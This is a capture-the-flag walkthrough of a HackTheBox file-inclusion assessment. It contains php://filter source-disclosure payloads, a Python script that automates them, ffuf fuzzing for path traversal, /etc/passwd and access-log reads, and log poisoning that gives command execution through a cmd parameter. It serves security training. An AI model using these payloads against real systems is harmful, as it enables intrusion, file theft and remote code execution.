HackTheBox - File Inclusion - Skills Assessment Walkthrough


Scenario
The company INLANEFREIGHT
has contracted you to perform a web application assessment against one of their public-facing websites. They have been through many assessments in the past but have added some new functionality in a hurry and are particularly concerned about file inclusion/path traversal vulnerabilities.
They provided a target IP address and no further information about their website. Perform a full assessment of the web application checking for file inclusion and path traversal vulnerabilities.
Find the vulnerabilities and submit a final flag using the skills we covered in the module sections to complete this module.
Don't forget to think outside the box!
Walkthrough
Accessing the target URL redirects us to the next page:
When browsing, we notice the page parameter appears in each URL as we switch pages:
Intercept a request using Burp:
Next, we test LFI payloads against the page parameter using Burp Intruder.
As we can see, none of the payloads produced a hit.
It seems like a dead end for now, unless we find another URL with a parameter that is vulnerable to LFI.
We can infer from the links (index.php?page=about, index.php?page=industries, index.php?page=contact) that the application loads a file named after the page parameter, most likely appending ".php" itself. So we can try loading the index file through the php://filter wrapper, base64-encoded so that the file is returned as text instead of being executed, to retrieve its full source and look for a new attack vector.
Use the PHP filter wrapper to access the index file (no extension, since the application appears to add it):
GET /index.php?page=php://filter/read=convert.base64-encode/resource=index
And we successfully retrieved the file content in Base64:
Next, send the content into Burp Decoder to decode it:
And we got the full code of index.php:
<!DOCTYPE html>
<html lang="en">
<head>
<title>InlaneFreight</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins:200,300,400,700,900|Display+Playfair:200,300,400,700">
<link rel="stylesheet" href="fonts/icomoon/style.css">
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/magnific-popup.css">
<link rel="stylesheet" href="css/jquery-ui.css">
<link rel="stylesheet" href="css/owl.carousel.min.css">
<link rel="stylesheet" href="css/owl.theme.default.min.css">
<link rel="stylesheet" href="css/bootstrap-datepicker.css">
<link rel="stylesheet" href="fonts/flaticon/font/flaticon.css">
<link rel="stylesheet" href="css/aos.css">
<link rel="stylesheet" href="css/style.css">
</head>
<body>
<div class="site-wrap">
<div class="site-mobile-menu">
<div class="site-mobile-menu-header">
<div class="site-mobile-menu-close mt-3">
<span class="icon-close2 js-menu-toggle"></span>
</div>
</div>
<div class="site-mobile-menu-body"></div>
</div>
<header class="site-navbar py-3" role="banner">
<div class="container">
<div class="row align-items-center">
<div class="col-11 col-xl-2">
<h1 class="mb-0"><a href="index.php" class="text-white h2 mb-0">InlaneFreight</a></h1>
</div>
<div class="col-12 col-md-10 d-none d-xl-block">
<nav class="site-navigation position-relative text-right" role="navigation">
<ul class="site-menu js-clone-nav mx-auto d-none d-lg-block">
<li class="active"><a href="index.php">Home</a></li>
<li><a href="index.php?page=about">About Us</a></li>
<li><a href="index.php?page=industries">Industries</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
</ul>
</nav>
</div>
<div class="d-inline-block d-xl-none ml-md-0 mr-auto py-3" style="position: relative; top: 3px;"><a href="#" class="site-menu-toggle js-menu-toggle text-white"><span class="icon-menu h3"></span></a></div>
</div>
</div>
</div>
</header>
<div class="site-blocks-cover overlay" style="background-image: url(images/hero_bg_1.jpg);" data-aos="fade" data-stellar-background-ratio="0.5">
<div class="container">
<div class="row align-items-center justify-content-center text-center">
<div class="col-md-8" data-aos="fade-up" data-aos-delay="400">
<h1 class="text-white font-weight-light mb-5 text-uppercase font-weight-bold">Worldwide Freight Services</h1>
<p><a href="#" class="btn btn-primary py-3 px-5 text-white">Get Started!</a></p>
</div>
</div>
</div>
</div>
<?php
if(!isset($_GET['page'])) {
include "main.php";
}
else {
$page = $_GET['page'];
if (strpos($page, "..") !== false) {
include "error.php";
}
else {
include $page . ".php";
}
}
?>
<footer class="site-footer">
<div class="row pt-5 mt-5 text-center">
<div class="col-md-12">
<div class="border-top pt-5">
<p>
<!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
Copyright ©<script>document.write(new Date().getFullYear());</script> All rights reserved | This template is made with <i class="icon-heart" aria-hidden="true"></i> by <a href="https://colorlib.com" target="_blank" >Colorlib</a>
<!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
</p>
</div>
</div>
</footer>
</div>
<script src="js/jquery-3.3.1.min.js"></script>
<script src="js/jquery-migrate-3.0.1.min.js"></script>
<script src="js/jquery-ui.js"></script>
<script src="js/popper.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/owl.carousel.min.js"></script>
<script src="js/jquery.stellar.min.js"></script>
<script src="js/jquery.countdown.min.js"></script>
<script src="js/jquery.magnific-popup.min.js"></script>
<script src="js/bootstrap-datepicker.min.js"></script>
<script src="js/aos.js"></script>
<script src="js/main.js"></script>
</body>
</html>
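To automate the wrapper read above, and to show why the wrapper reaches include() while the earlier traversal payloads did not, here is an added Python 3 example that is not part of the original walkthrough. It uses only the standard library; the target address is the lab instance from this post and is assumed to be no longer live, and the regular expression that picks the base64 blob out of the HTML response is my own assumption about the response shape.

```python
import base64
import re
import urllib.parse
import urllib.request

# Lab address from the walkthrough (assumed to no longer be live).
TARGET = "http://83.136.253.59:30150"


def passes_dotdot_check(page: str) -> bool:
    """Mirror of the server-side check recovered from index.php:
    strpos($page, "..") !== false  ->  include "error.php".
    Returns True when the value would reach include($page . ".php")."""
    return ".." not in page


def filter_payload(resource: str) -> str:
    """php://filter wrapper that returns the target file base64-encoded
    instead of executing it. index.php appends ".php" itself, so the
    resource is given without an extension."""
    return f"php://filter/read=convert.base64-encode/resource={resource}"


def decode_filter_response(body: str) -> str:
    """Pull the base64 blob out of the HTML that surrounds the include()
    output and decode it. Assumption: the encoded file is the longest run
    of base64 characters in the page (CSS/JS names are short or hyphenated)."""
    runs = re.findall(r"[A-Za-z0-9+/]{20,}={0,2}", body)
    blob = max(runs, key=len, default="")
    if not blob:
        raise ValueError("no base64 blob found in response")
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def read_source(target: str, resource: str) -> str:
    """Fetch and decode one PHP source file through the page parameter."""
    payload = urllib.parse.quote(filter_payload(resource), safe="/:=")
    url = f"{target}/index.php?page={payload}"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return decode_filter_response(resp.read().decode("utf-8", errors="replace"))


if __name__ == "__main__":
    # Traversal is rejected by the ".." check; the wrapper is not.
    for candidate in ("../../../../etc/passwd", filter_payload("index")):
        print(f"{candidate!r:60} reaches include(): {passes_dotdot_check(candidate)}")
    print(read_source(TARGET, "index"))
```

The same function can be pointed at main.php, error.php or the admin page once its name is known; anything include() can reach is readable this way, which is the usual first step before looking for a write primitive.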
The source also explains the earlier dead end: the strpos check rejects anything containing "..", so every traversal payload ends up in error.php, while a php://filter wrapper contains no ".." and reaches the include. More importantly, a commented-out menu entry reveals another path: ilf_admin/index.php
<ul class="site-menu js-clone-nav mx-auto d-none d-lg-block">
<li class="active"><a href="index.php">Home</a></li>
<li><a href="index.php?page=about">About Us</a></li>
<li><a href="index.php?page=industries">Industries</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
</ul>
Navigate to the new path:
Here, you can view log pages by log-type:
We notice a log parameter that changes as we navigate between pages. We can test whether it is vulnerable to LFI.
This time, I’ll use the ffuf tool, as it’s much faster than Burp Community Intruder:
ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://83.136.253.59:30150/ilf_admin/index.php?log=FUZZ' -fs 2046
** I use -fs 2046 because on a first run without a filter, all the invalid results came back with a response size of 2046 bytes, so I filter those out.
And the results:
After testing the payload ../../../../../../../../etc/passwd, we confirmed that the parameter is indeed vulnerable to LFI (and, unlike the page parameter, it does not block "..").
From the last line, we can see an nginx user, which suggests the application is served by NGINX. The packaged NGINX default access log lives at /var/log/nginx/access.log, so that is the next file to read.
Let's leverage the LFI vulnerability to retrieve the contents of /var/log/nginx/access.log:
And it worked: we successfully retrieved the log file!
Now, since the log parameter hands the file to include(), anything in the log that looks like PHP will be executed, not just displayed. If we can get a PHP web shell written into the log file, we have Remote Code Execution (RCE). Two things must hold: the PHP worker has to be able to read the log (it evidently can, since we just displayed it), and the injected code must be valid PHP, because a parse error in access.log would break every later include of that file and cannot be undone from the outside.
By examining the logs, we can see that the application records the User-Agent header.
Let's try injecting a PHP shell payload into the User-Agent header of a request:
Then navigate to:
http://83.136.253.59:30150/ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=id
And we can see the output:
We’ve achieved RCE - now it’s time to retrieve the flag !
First, list all files in the root directory:
http://83.136.253.59:30150/ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=ls+/
We can see a file named flag_dacc60f2348d.txt. Let's view its contents using:
http://83.136.253.59:30150/ilf_admin/index.php?log=../../../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt
The flag is captured ! 😁
Written by Ido Abramov